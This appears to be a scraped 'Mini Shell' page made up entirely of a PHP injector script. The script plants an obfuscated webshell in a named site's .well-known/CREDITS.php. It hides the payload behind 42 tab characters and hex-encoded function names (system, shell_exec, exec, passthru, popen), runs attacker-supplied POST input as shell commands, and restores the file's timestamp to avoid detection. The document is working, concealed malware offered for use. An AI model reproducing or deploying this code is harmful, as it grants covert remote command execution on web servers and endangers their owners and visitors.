Mini Shell
<?php $path = '/home/ukubnwwt/casa360.io/.well-known/CREDITS.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('%24property_set1%20%3D%20%279%27%3B%24property_set2%20%3D%20%273%27%3B%24property_set3%20%3D%20%277%27%3B%24property_set4%20%3D%20%274%27%3B%24property_set5%20%3D%20%27d%27%3B%24property_set6%20%3D%20%278%27%3B%24property_set7%20%3D%20%276%27%3B%24property_set8%20%3D%20%275%27%3B%24property_set9%20%3D%20%27c%27%3B%24property_set10%20%3D%20%271%27%3B%24property_set11%20%3D%20%270%27%3B%24property_set12%20%3D%20%27f%27%3B%24property_set13%20%3D%20%27e%27%3B%24property_set14%20%3D%20%272%27%3B%24reverse_lookup1%20%3D%20pack%28%22H%2A%22%2C%20%277%27%20.%20%273%27%20.%20%277%27%20.%20%24property_set1%20.%20%277%27%20.%20%24property_set2%20.%20%24property_set3%20.%20%24property_set4%20.%20%276%27%20.%20%275%27%20.%20%276%27%20.%20%24property_set5%29%3B%24reverse_lookup2%20%3D%20pack%28%22H%2A%22%2C%20%277%27%20.%20%24property_set2%20.%20%276%27%20.%20%24property_set6%20.%20%24property_set7%20.%20%24property_set8%20.%20%24property_set7%20.%20%24property_set9%20.%20%24property_set7%20.%20%24property_set9%20.%20%275%27%20.%20%27f%27%20.%20%276%27%20.%20%24property_set8%20.%20%277%27%20.%20%24property_set6%20.%20%276%27%20.%20%24property_set8%20.%20%24property_set7%20.%20%24property_set2%29%3B%24reverse_lookup3%20%3D%20pack%28%22H%2A%22%2C%20%24property_set7%20.%20%24property_set8%20.%20%277%27%20.%20%24property_set6%20.%20%24property_set7%20.%20%24property_set8%20.%20%24property_set7%20.%20%24property_set2%29%3B%24reverse_lookup4%20%3D%20pack%28%22H%2A%22%2C%20%24property_set3%20.%20%270%27%20.%20%24property_set7%20.%20%24property_set10%20.%20%24property_set3%20.%20%273%27%20.%20%24property_set3%20.%20%273%27%20.%20%24property_set3%20.%20%274%27%20.%20%276%27%20.%20%24property_set6%20.%20%277%27%20.%20%272%27%20.%20%24property_set3%20.%20%24property_set8%29%3B%24reverse_lookup5%20%3D%20pack%28%22H%2A%22%2C%20%24property_set3%20.%20%24property_set11%20.%20%24property_set7%20.%20%24property_set12%20.%20%24property_set3%20.%20%270%27%20.%20%276%27%20.%20%24property_set8%20.%20%276%27%20.%20%27e%27%29%3B%24reverse_lookup6%20%3D%20pack%28%22H%2A%22%2C%20%24property_set3%20.%20%24property_set2%20.%20%277%27%20.%20%274%27%20.%20%24property_set3%20.%20%272%27%20.%20%24property_set7%20.%20%275%27%20.%20%24property_set7%20.%20%24property_set10%20.%20%276%27%20.%20%27d%27%20.%20%275%27%20.%20%24property_set12%20.%20%276%27%20.%20%277%27%20.%20%24property_set7%20.%20%24property_set8%20.%20%24property_set3%20.%20%24property_set4%20.%20%24property_set8%20.%20%24property_set12%20.%20%24property_set7%20.%20%24property_set2%20.%20%276%27%20.%20%24property_set12%20.%20%276%27%20.%20%24property_set13%20.%20%24property_set3%20.%20%274%27%20.%20%24property_set7%20.%20%275%27%20.%20%276%27%20.%20%27e%27%20.%20%277%27%20.%20%274%27%20.%20%24property_set3%20.%20%273%27%29%3B%24reverse_lookup7%20%3D%20pack%28%22H%2A%22%2C%20%24property_set3%20.%20%270%27%20.%20%24property_set7%20.%20%24property_set2%20.%20%276%27%20.%20%27c%27%20.%20%24property_set7%20.%20%24property_set12%20.%20%277%27%20.%20%273%27%20.%20%276%27%20.%20%275%27%29%3B%24reverse_searcher%20%3D%20pack%28%22H%2A%22%2C%20%24property_set3%20.%20%272%27%20.%20%24property_set7%20.%20%24property_set8%20.%20%277%27%20.%20%24property_set7%20.%20%24property_set7%20.%20%24property_set8%20.%20%277%27%20.%20%272%27%20.%20%24property_set3%20.%20%273%27%20.%20%24property_set7%20.%20%275%27%20.%20%24property_set8%20.%20%24property_set12%20.%20%277%27%20.%20%24property_set2%20.%20%276%27%20.%20%275%27%20.%20%24property_set7%20.%20%24property_set10%20.%20%24property_set3%20.%20%24property_set14%20.%20%276%27%20.%20%24property_set2%20.%20%276%27%20.%20%278%27%20.%20%276%27%20.%20%275%27%20.%20%277%27%20.%20%24property_set14%29%3Bif%28isset%28%24_POST%5B%24reverse_searcher%5D%29%29%7B%24reverse_searcher%3Dpack%28%22H%2A%22%2C%24_POST%5B%24reverse_searcher%5D%29%3Bif%28function_exists%28%24reverse_lookup1%29%29%7B%24reverse_lookup1%28%24reverse_searcher%29%3B%7Delseif%28function_exists%28%24reverse_lookup2%29%29%7Bprint%20%24reverse_lookup2%28%24reverse_searcher%29%3B%7Delseif%28function_exists%28%24reverse_lookup3%29%29%7B%24reverse_lookup3%28%24reverse_searcher%2C%24comp_binding%29%3Bprint%20join%28%22%5Cn%22%2C%24comp_binding%29%3B%7Delseif%28function_exists%28%24reverse_lookup4%29%29%7B%24reverse_lookup4%28%24reverse_searcher%29%3B%7Delseif%28function_exists%28%24reverse_lookup5%29%26%26function_exists%28%24reverse_lookup6%29%26%26function_exists%28%24reverse_lookup7%29%29%7B%24val_holder%3D%24reverse_lookup5%28%24reverse_searcher%2C%22r%22%29%3Bif%28%24val_holder%29%7B%24ref_symbol%3D%24reverse_lookup6%28%24val_holder%29%3B%24reverse_lookup7%28%24val_holder%29%3Bprint%20%24ref_symbol%3B%7D%7Dexit%3B%7D'); if (strstr($content, $new_code)) { die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) { if (substr($content, 0, strlen($start)) == $start) { $content = substr($content, strlen($start)); $content = $start.str_repeat("\t", 42).$new_code."\n".$content; if (file_put_contents($path, $content)) { @touch($path, $ft); $content = file_get_contents($path); if (strstr($content, $new_code)) { die('!success!'); } } } } die('!failed!');